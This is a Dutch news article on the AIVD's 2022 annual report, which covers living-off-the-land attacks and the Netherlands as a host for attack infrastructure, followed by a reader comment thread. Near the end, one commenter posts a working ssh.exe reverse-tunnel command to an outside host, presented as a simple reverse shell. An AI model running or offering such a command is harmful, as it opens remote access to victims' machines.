AIVD: Nederland is aantrekkelijk voor hosten van aanvalsinfrastructuur

Staatshackers gebruiken steeds vaker living off the land-technologie bij hun aanvallen. Dat betekent dat hackers tools gebruiken die al op een pc staan. Verder blijkt Nederland een belangrijk land te zijn om aanvalsinfrastructuur te hosten, stelt de AIVD in zijn jaarverslag.

De Nederlandse Algemene Inlichtingen- en Veiligheidsdienst schrijft in zijn jaarverslag over 2022 dat Nederland 'doorlopend geconfronteerd wordt met digitale aanvallen'. Die komen uit Rusland en China, maar ook uit Iran en Noord-Korea. De AIVD zag dat 'verschillende landen met offensieve cyberprogramma's probeerden data te stelen in de (Europese) reis- en luchtvaartsector', maar de dienst geeft daar verder weinig informatie over. De AIVD waarschuwt verder voor de gevaren voor aanvallen op vitale infrastructuur, die de maatschappij ernstig kunnen ontwrichten. Die waarschuwing komt niet alleen van de veiligheidsdienst, maar ook van andere instanties, zoals al jaren van de Nationaal Coördinator Terrorismebestrijding en Veiligheid.

De AIVD merkt vooral op dat statelijke actoren steeds vaker gebruikmaken van 'living off the land'-methoden. Bij zo'n aanval worden tools misbruikt die al op een systeem staan, zoals PowerShell, om een aanval uit te voeren of bijvoorbeeld hogere toegangsrechten te krijgen op die systemen.

Het misbruiken van de Nederlandse ict-infrastructuur is volgens de AIVD een aantrekkelijke methode om aanvallen uit te voeren. Experts waarschuwen ook daarvoor al jaren. Nederland heeft veel goedkope, stabiele en kwalitatieve servercapaciteit die criminelen kunnen huren. Dat wordt vaak gedaan door hackers die een command-and-control-server willen opzetten.

Veel cyberdreigingen kwamen in 2022 van softwarekwetsbaarheden die al bekend waren. "Soms gaat het om kwetsbaarheden die nog maar net bekend zijn en waarvoor softwareleveranciers nog geen beveiligingsupdate hebben. Binnen enkele dagen blijken statelijke actoren in staat om zulke kwetsbaarheden te misbruiken. Maar het gaat ook om allang bekende kwetsbaarheden, waarvoor wel degelijk beveiligingsupdates beschikbaar zijn. Die heeft het slachtoffer dan nog niet geïnstalleerd."

De AIVD schrijft vorig jaar voor het eerst gebruik te hebben gemaakt van zijn bevoegdheid om kabels af te tappen. Die kabelinterceptie is vastgelegd in de Tijdelijke wet cyberoperaties, die een opmaat moet vormen voor een aanpassing van de Wet op de inlichtingen- en veiligheidsdiensten. In het jaarverslag noemt de AIVD die wet, die volgens de dienst niet meer voldoet. De AIVD pleit voor aanpassing van die wet, maar in dit geval voornamelijk vanwege de zogenaamde gerichtheidsvereiste, die voorschrijft wanneer de dienst kabelverkeer mag onderscheppen.

Reacties (35)

Robin94 17 april 2023 17:35

Tja, niet heel gek toch. Net zoals dat de haven van Rotterdam aantrekkelijk is voor drugs smokkel.

Tintel

Politiek en recht

@Robin94 • 18 april 2023 10:41

Nou, ik lees vooral "wij van de AIVD hebben terecht zoveel bevoegheden omdat Nederland veel gebruikt wordt om te hacken, echt waar..."

De AIVD merkt vooral op dat statelijke actoren steeds vaker gebruikmaken van 'living off the land'-methoden. Bij zo'n aanval worden tools misbruikt die al op een systeem staan, zoals PowerShell

Wat? Dat powershell beschikbaar is op de PC's / servers - in tegenstelling tot in andere landen? Dat is voor veel windows installaties een standard component....

Nederland heeft veel goedkope, stabiele en kwalitatieve servercapaciteit die criminelen kunnen huren.

En andere landen hebben dat niet....?

het jaarverslag noemt de AIVD die wet, die volgens de dienst niet meer voldoet.

En dat is de kicker.... ze willen nog meer bevoegheden...

gamezfreak @Robin94 • 17 april 2023 17:46

Nederland wordt vaak gekozen vanwege de uitstekende infrastructuur (ondanks dat we vaak zelf veel klagen

).
Maar dat terzijde, Nederland heeft als een van de vrij weinige landen een stabiele connectie, op zowel intercontinentale verbindingen, als op landelijke niveau. Daarnaast is AMS-IX een van de grootste, zo niet de grootste internet exchangepunt. Mede daardoor scoort Nederland het dus goed. Dus als AMS-IX uit zou vallen, dan heeft dat grote gevolgen voor niet alleen bedrijven, maar ook voor de mensen zelf.

Het nadeel hiervan is, is dat veel hackers en criminelen, gebruik maken van de Nederlandse infrastructuur om hun aanvallen voort te zetten. Dit zorgt ervoor dat de eerste IP adres vanuit Nederland komt en niet vanuit Azië of Afrika. Zie de Cyberkaart voor als je het live wilt zien.

Wie weet krijgen wij straks van de AIVD te horen hoeveel servers er mede hierdoor, offline worden gehaald. gezien niet elke hosting provider daadwerkelijk controleert wat er over hun lijn gaat.

GeroldM @gamezfreak • 17 april 2023 19:02

Kan je verzekeren dat de exchange in Brazilie groter is, c.q meer traffic verwerkt dan de AMS-IX. Nu is de Braziliaanse IX verdeeld over 9 locaties in Sao Paulo, dus qua fysieke omvang is het makkelijk om te stellen dat deze groter zal zijn dan de AMS-IX.

Maar als het gaat over stabiliteit, dan wint de AMS-IX het wel van de Braziliaanse IX. Kwaliteit ook wel. Sao Paulo is een enorme stad qua omvang (30 miljoen inwoners als ik het goed begrepen heb) en het Braziliaanse stroomnet is degelijk genoeg, maar bij lane niet zo degelijk als het stroomgrid in Nederland. Het komt geregeld voor dat een locatie een probleem heeft met electricieit en/of koeling en traffic van de ene locatie via een andere locatie moet worden herleid.

Je mag dan misschien klagen over stroom/spanning in NL.Vertoef een tijd op een ander continent en je beseft dat het electriciteitsrid van NL lang niet zo slecht is als dat je misschien denkt.

gooos @GeroldM • 17 april 2023 22:42

Sao Paolo heeft wel meer uitdagingen voor datacenters. Ook de betrouwbaarheid van de datakabels (fibers) in de grond laten nog wel eens te wensen over tot het punt dat er moedwillig een graafmachine door de kabels gejaagd wordt omdat ze geld proberen los te krijgen van de gemeente...
Vandaar dat ik toen ik daar met andere Europese collega's een platform aan het opbouwen was, van de lokale netwerk collega's te horen kreeg dat we hoe dan ook gebruik moesten maken van de straalverbindingen tussen de 2 datacenters in, iets wat totaal niet in het gestandaardiseerde concept van het platform past.
Bizarre setup trouwens waarbij "1" straalverbinding gesplitst over 2 routes ging (eentje net geen 28km en de andere ruim 72km!) en de betrouwbaarheid daarvan liet flink te wensen over. Ach ja, we hebben daar uiteindelijk maar de heartbeat over laten lopen om de Braziliaanse collega's tevreden te houden. Alle data (sync) gaat gewoon door de fibers door de grond.

Z100 @GeroldM • 18 april 2023 04:45

Je mag dan misschien klagen over stroom/spanning in NL.Vertoef een tijd op een ander continent en je beseft dat het electriciteitsrid van NL lang niet zo slecht is als dat je misschien denkt.

Absoluut. UPSen zijn hier nooit echt een ding geworden voor huishoudelijk gebruik, maar vrienden over veel werelddelen gebruiken die wel vanwage instabiliteitsproblematiek. Zelfde betreft dual WAN: hier nooit echt nodig geweest voor 99% van de bevolking.

Ondanks dat ons stroomnet op druk staat, hebben wij nog idd nog steeds een goed netwerk.

We klagen veel dat NL duur is, maar onze netwerken, of het nou elektra, gas, water, wegen, trein etc zijn, horen bij de top in de wereld. Alles kan altijd beter, maar zaken in perspectief houden is wel op zijn plaats.

Daarom is het anzich best jammer dat het voor veel NLers reizen te duur aan het worden is. Hoe meerr mensen reizen. Het is belangrijk om over de grens te kunnen kijken om perspectief op de wereld en je eigen land te verbeteren.

jaenster

@gamezfreak • 17 april 2023 18:09

Ik klaag altijd over de wachttijd bij stoplichten, maar iedereen weet dat als je 1x in antwerpen hebt rond gereden dat je weer een maand genezen bent van die klacht.

Juist door dat we zo een klagend volkje zijn stellen we ook goede eisen aan de infrastructuur, en verbetert die constant. Al heb ik de indruk dat we daar de laatste jaren aan het verwaarlozen. Zitten ook voordelen aan, over paar jaar trekt de hosting hiervoor naar duitsland ofzo

Clevergyno @jaenster • 17 april 2023 19:29

De structurele bezuinigingen op het leven door rechts afgelopen 15 jaar is inderdaad de wind eruit aan het halen. Behalve dan bij de aandeelhouders

m_snel @Clevergyno • 17 april 2023 21:54

Ik ben niet zo bekend in Belgie. Maar brussel is goed te doen.

YangWenli @gamezfreak • 17 april 2023 19:55

Je kunt in Nederland zaken doen zonder maar 1 woord Nederlands. Hoef je in Duitsland niet te proberen

Andros @YangWenli • 18 april 2023 04:06

Ik kan in Duitsland nochtans prima zaken doen zonder een woord Nederlands, ik heb die taal daar nauwelijks nodig

jurroen @Andros • 18 april 2023 09:20

Nochtans - jij bent een Belg?

Andros @jurroen • 18 april 2023 12:28

Ja/Nee/Niet van toepassing

Toet3r @gamezfreak • 17 april 2023 18:14

Net opgezocht en vind tegenstrijdige antwoorden de ene site zegt de ams-ix, andere hebben het over de Duitse en volgens wikipedia de Braziliaanse internet exchange.

Twiekiebird @Toet3r • 17 april 2023 18:30

Hangt er maar net vanaf wat je de grootste noemt: meeste unieke peers, meeste routes, meeste verkeer, meeste datacenters waar de exchange zit... Mijn favoriet is Slovenië, daar is letterlijk het hele land bereikbaar via de route servers van de exchange SIX.SI $_/-\o_$

TweakerCarlo @gamezfreak • 18 april 2023 10:41

Dat is net als met de boeren. Als je alles verdeelt over de landen die het gebruiken scoren we ineens minder en veel ook. Maar ja het gaat om de output toch?

themadone 17 april 2023 18:40

Oh dus ze weten het wel, maar opruimen ho maar. Ik vind nog steeds dat we dit soort landen gewoon uit moeten sluiten van het internet.

Er komt zoveel zooi vandaan, en zelfs als je die landen geo blocked huren ze met bitcoin een server in nederland en komt het daarvandaan.

Helemaal tegenhouden doe je het natuurlijk nooit maar het verbaast me dat we niet met regelmaat invallen bij Leaseweb en dergelijke hosters zien. Neem die command and controls gewoon in beslag dan denkt de hoster volgende keer ook wel even 2 keer na voordat ze zaken doen met schimmige lui. Wil je weten waar ze staan? Check abuseipdb, hoe moeilijk kan het zijn.

Het is ridicuul dat er verwacht wordt dat een gemiddelde mkb onderneming met dito gemiddelde beheerder of beheerspartij hiertegen opgewassen is, dus wat mij betreft meer actie vanuit overheid en opsporingsdiensten.

Bender @themadone • 17 april 2023 19:07

Oh dus ze weten het wel, maar opruimen ho maar. Ik vind nog steeds dat we dit soort landen gewoon uit moeten sluiten van het internet.

Ze gebruiken in alle gevallen een VPN, dus blokkeren heeft geen enkel zin.

Helemaal tegenhouden doe je het natuurlijk nooit maar het verbaast me dat we niet met regelmaat invallen bij Leaseweb en dergelijke hosters zien. Neem die command and controls gewoon in beslag dan denkt de hoster volgende keer ook wel even 2 keer na voordat ze zaken doen met schimmige lui. Wil je weten waar ze staan? Check abuseipdb, hoe moeilijk kan het zijn.

Omdat als je leaseweb hebt, nog niet weet om welke server het gaat.. Je vergeet even dat veel servers in afgesloten racks staan, of dat het een VPS is, of zelfs shared hosting.
Je staat 20 stappen over voordat je weet om welke omgeving het gaat.. dus "hoe moeilijk kan het zijn" blijkt toch wel heel wat moeilijker te zijn.

dus wat mij betreft meer actie vanuit overheid en opsporingsdiensten.

Zoals? Een datacenter uitzetten?

themadone @Bender • 17 april 2023 19:54

Zoals gewoon de machines behorend bij de ips die scannen en hacken in beslag nemen, is echt niet moeilijk, wat jou afgesloten rack, ze weten precies welke ranges bij welke cages horen.

Zolang we slap blijven in de aanpak blijft dit door gaan.

locke960 @themadone • 17 april 2023 20:35

Je hebt zojuist een nieuwe Denial Of Service attack uitgevonden.
1. Huur voor een grijpstuiver een VPS bij een concurrent.
2. Haal er rottigheid mee uit.
3. Instanties nemen alle machines die bij het IP adres horen mee. Waarschijnlijk een complete virtualisering omgeving met duizenden VPS'en erop.
4. Concurrent verliest heel veel geld, andere getroffen klanten lopen kwaad weg.
5. profit!

Verder hoop ik voor jou dat de PC van een huisgenoot niet besmet wordt en als onderdeel van een botnet ingezet wordt. Want dan moet natuurlijk ook alle apparatuur dat bij het IP adres hoort in beslag genomen worden, we willen tenslotte niet met 2 maten meten.

Bender @themadone • 17 april 2023 20:48

Volgens mij heb je niet gelezen wat ik getypt heb.

Je weet namelijk helemaal niet welke IP naar welke machine gaat... het internet is wel iets complexer met switches, routers, cages, vpsen dan IP gaat naar server X.

Muncher @themadone • 17 april 2023 21:29

Ik dacht dat Leaseweb tegenwoordig een wat meer reputable partij is. In het verleden las ik er nog wel eens rare dingen over maar dit tijd lijkt voorbij. Heb ik iets gemist? Zijn er nog andere “bekende” slechte hosters?

Bender @Muncher • 18 april 2023 14:14

Leaseweb levert veel infrastructuur aan hosters, die ook gewoon netjes zijn. Maar die weten ook niet altijd wat hun klanten hosten, of hun resellers weer resellen.

jurroen @themadone • 18 april 2023 09:28

Helemaal tegenhouden doe je het natuurlijk nooit maar het verbaast me dat we niet met regelmaat invallen bij Leaseweb en dergelijke hosters zien. Neem die command and controls gewoon in beslag dan denkt de hoster volgende keer ook wel even 2 keer na voordat ze zaken doen met schimmige lui. Wil je weten waar ze staan? Check abuseipdb, hoe moeilijk kan het zijn.

Leaseweb (en co) hebben zelf een uitgebreide KYC waarbij ze de klant echt wel doorlichten. Daar zit het probleem denk ik ook niet - dat foute verkeer komt van klanten van hun resellers af, die niet doorlichten, betalingen in cryptovaluta etc accepteren.

Of - zoals het artikel ook correct aangeeft, een gehackte server, omdat ze net een dag te laat waren met patchen (of inzet zero day). Dan maakt het niet uit wat je klant doet of diens intentie is.

En wil je Leaseweb en mogelijke andere klanten daar maar voor straffen?

Andros @themadone • 18 april 2023 12:31

Oh dus ze weten het wel, maar opruimen ho maar. Ik vind nog steeds dat we dit soort landen gewoon uit moeten sluiten van het internet.

Sinds wanneer is "het internet" van ons en zijn wij daar de baas over?

themadone @Andros • 18 april 2023 13:09

Nee, lekker door gaan zo en dan knalt er af en toe maar een mkb onderneming omver. We sluiten criminelen ook op zonder internet. Als een heel land er vol mee zit en de autoriteiten niet meewerken aan opsporing en uitlevering is het toch niet zo'n gekke gedachte om de glasvezel door te halen.

Waarschijnlijk binnen een dag rellen door de gewone bevolking en daarna wel gewoon opvolging en vervolging voor de hackers.

Andros @themadone • 18 april 2023 14:12

Ligt er volledig aan wie de eigenaar van die vezel is. Voor je het weet heb je zelf een rechtzaak aan je been wegens sabotage of vernieling incl vervolgschade...

Mel33 17 april 2023 18:19

Edit

Ja wij zijn een land waar veel kennis is in dit gebied, en waar dus ook veel tools en Tweaks worden gemaakt of gezocht, Wij passen ons zelf aan, of passen iets wat niet goed werkt aan. Wij zijn nou eenmaal zo'n soort volk met universiteiten enz enz. Dus ja dan is er hier ook veel te misbruiken.
Maar wat dacht je van India, dat zijn geboren Tweakers haha, Wat denk je dat daar te halen valt. nee Ik snap de waarschuwing. maar je kan alleen de 'verantwoordelijkheid, en ethiek verhogen' in dit soort zaken. Wat ze nu doen is achter de feiten aanlopen met een tap, en zo haal je het nooit in hoor.
Ja je pakt af en toe eens wat, maar grosso modo is dat met deze werkwijze van tappen enz nooit groot rendabel of effectief. Dat dit amper werkt weten ze al sinds 100jaar toch?
Maar ik begrijp ook dat je wel iets moet doen, en dan zie ik dit dan maar als een klein onderdeel van de oplossing. en om daar dan weer een heel volk zijn Tweak-Ability voor af te nemen is dan niet heel zuiver en slim om te doen.

[Reactie gewijzigd door Mel33 op 23 juli 2024 04:10]

Dreamvoid 17 april 2023 18:27

Zo raar is die trend van "living off the land" niet, tegenwoordig heeft iedereen met een server wel door dat je in je firewall alle connecties afkomstig van China/Rusland beter maar gewoon allemaal kan droppen. Dus als die binnen willen komen moeten ze wel van Nederlandse IP ranges gaan komen.

Bor Coördinator Frontpage Admins / FP Powermod

Beveiliging en antivirus

@Dreamvoid • 17 april 2023 18:31

Zo raar is die trend van "living off the land" niet.
Dus als die binnen willen komen moeten ze wel van Nederlandse IP ranges gaan komen.

Binnenkomen met een Nederlands IP (wat met vrijwel elke willekeurige VPN aanbieder al kan) heeft op zich weinig tot niets van doen met Living of the Land (LotL) attack. Bij een LotL aanval gebruikt een indringer legitieme software en functies die op een systeem beschikbaar zijn zoals bijvoorbeeld Powershell en WMI om kwaadaardige acties uit te voeren.

wildhagen

Beveiliging en antivirus
Nederland
Politiek en recht
Privacy

@Dreamvoid • 17 april 2023 18:31

Hoeft natuurlijk niet. Ze kunnen ook met een VPN-verbinding uit, bijvoorbeeld, de VS binnen komen.

Of ze gebruiken Tor, of een soortgelijke dienst.

Of men maakt gebruik van een botnet. Die staan doorgaans in verschillende landen.

spikedradiator 17 april 2023 18:35

Sinds 2018 besloot Microsoft om openssh toe te voegen.
Een reverse shell met een empty password is simpel:

ssh.exe [email protected] -f -N -R 50000 -p 443 -o StrictHostKeyChecking=no

https://www.blackhillsinf...tell-them-i-am-not-https/

Op dit item kan niet meer gereageerd worden.

AIVD: Nederland is aantrekkelijk voor hosten van aanvalsinfrastructuur

Lees meer

Reacties (35)

Sorteer op:

Weergave: